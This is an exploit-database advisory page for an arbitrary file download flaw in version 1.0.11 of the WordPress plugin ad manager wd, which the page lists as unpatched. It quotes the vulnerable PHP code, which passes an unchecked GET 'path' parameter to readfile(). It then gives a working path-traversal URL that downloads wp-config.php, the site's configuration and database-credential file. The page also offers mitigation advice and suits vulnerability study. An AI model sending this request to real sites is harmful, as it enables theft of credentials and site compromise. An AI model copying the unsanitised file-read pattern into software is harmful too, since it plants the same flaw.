header-logo
Suggest Exploit
vendor:
WordPress Plugin ad manager wd
by:
41!kh4224rDz
5.5
CVSS
MEDIUM
Arbitrary File Download
22
CWE
Product Name: WordPress Plugin ad manager wd
Affected Version From: 1.0.11
Affected Version To: 1.0.11
Patch Exists: NO
Related CWE:
CPE: a:web-dorado:ad_manager_wd:1.0.11
Metasploit:
Other Scripts:
Platforms Tested: Windows 7 x64
2019

WordPress Plugin ad manager wd v1.0.11 – Arbitrary File Download

The WordPress Plugin ad manager wd v1.0.11 allows an attacker to download arbitrary files from the server. This can lead to unauthorized access to sensitive information, such as configuration files.

Mitigation:

The vendor has not provided a patch for this vulnerability. To mitigate the risk, it is recommended to remove or disable the vulnerable plugin.
Source

Exploit-DB raw data:

Exploit Title: WordPress Plugin ad manager wd v1.0.11 - Arbitrary File
Download
Google Dork: N/A
Date: 25.01.2019
Vendor Homepage:
https://web-dorado.com/products/wordpress-ad-manager-wd.html
Software: https://wordpress.org/plugins/ad-manager-wd
Version: 1.0.11
Tested on: Win7 x64,

Exploit Author: 41!kh4224rDz
Author Mail : scanweb18@gmail.com

Vulnerability:
wp-content\plugins\ad-manager-wd\wd_ads_admin_class.php

   30/  if (isset($_GET['export']) && $_GET['export'] == 'export_csv')

   97/   $path = $_GET['path'];
           header('Content-Description: File Transfer');
           header('Content-Type: application/octet-stream');
           header('Content-Transfer-Encoding: binary');
           header('Expires: 0');
           header('Cache-Control: must-revalidate, post-check=0,
pre-check=0');
            header('Pragma: public');

           header('Content-Type: text/csv; charset=utf-8');
           header('Content-Disposition: attachment; filename=' .
basename($path));

           readfile($path);
 Arbitrary File Download/Exploit :

http://localhost/wordpress/wp-admin/edit.php?post_type=wd_ads_ads&export=export_csv&path=../wp-config.php